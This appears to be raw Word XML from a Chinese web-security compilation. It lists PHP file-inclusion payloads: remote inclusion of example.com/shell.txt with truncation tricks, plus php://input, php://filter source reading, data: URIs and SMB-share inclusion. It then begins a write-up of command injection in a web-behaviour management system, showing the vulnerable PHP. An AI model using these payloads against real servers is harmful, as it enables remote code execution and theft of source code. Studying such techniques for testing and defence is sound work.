          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-35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5.2.8(?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>可以成功，只适用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-16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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，点号需要长于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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256)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普通远程文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="361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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>$_GET['file']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?&gt;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spacing w:line="361" w:lineRule="exact"/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6"/>
        <w:spacing w:before="56" w:line="361" w:lineRule="exact"/>
        <w:ind w:left="777"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>远程代码执行：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?file</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>http|https|ftp]://example.com/shell.txt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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_fopen=On </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-5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allow_url_include=On)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1" w:lineRule="exact"/>
        <w:ind w:left="77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利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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 w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-27"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>allow_url_include=On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，详细→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://php.net/manual/en/wrappers.php.php)</w:t>
        </w:r>
      </w:hyperlink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1" w:lineRule="exact"/>
        <w:ind w:left="77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利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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?file=php://filter/convert.base64-encode/resou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>rce=index.php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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>同上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="363" w:lineRule="exact"/>
        <w:ind w:left="77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利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> data URIs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6784"/>
        </w:tabs>
        <w:spacing w:before="19" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="41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?file=data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/text/plain;base64,SSBsb3ZlIFBIUAo=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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-28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allow_url_include=On)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="77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利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行任意代码：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?file=</w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/path/xss.php?xss=phpcode</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink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pacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="11"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>allow_url_fopen=On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>allow_url_include=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="13"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>并且防火墙或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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白名单不允许访问外网时，先在同站点找一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>漏洞，包含这个页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面，就可以注入恶意代码了。条件非常极端和特殊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-15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-)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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3674"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="352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有限制的远程文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>$_GET['file'] . ".htm")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-18"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>&gt;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w w:val="27"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9843" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:19.15pt;width:319.25pt;height:54.05pt;z-index:3664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?file=</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId49">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>http://example.com/shell</w:t>
                    </w:r>
                  </w:hyperlink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?file=</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId50">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>http://example.com/shell.txt?</w:t>
                    </w:r>
                  </w:hyperlink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?file=</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId51">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>http://example.com/shell.txt%23</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="302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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_fopen=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include=On)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="77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?file=\evilshare\shell.php (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>只需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId52"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="80"/>
          <w:cols w:space="720"/>
        </w:sect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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="539" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="远程命令执行"/>
      <w:bookmarkStart w:id="40" w:name="惠尔顿上网行为管理系统命令执行"/>
      <w:bookmarkStart w:id="41" w:name="_bookmark19"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="34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惠尔顿上网行为管理系统命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="267"/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xfkxfk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="48"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/base/stats/realtime/user_prohibit_internet.php</w:t>
      </w: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9842" type="#_x0000_t202" style="width:337.5pt;height:181.2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$ip = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>REQUEST[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'ip'];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095" w:right="1537"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$duration = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>REQUEST[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'duration'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]; if($duration=="" || $duration==0){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="2012" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$str = "ipset -A drop_user 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ip;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$duration = $duration*60;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585" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
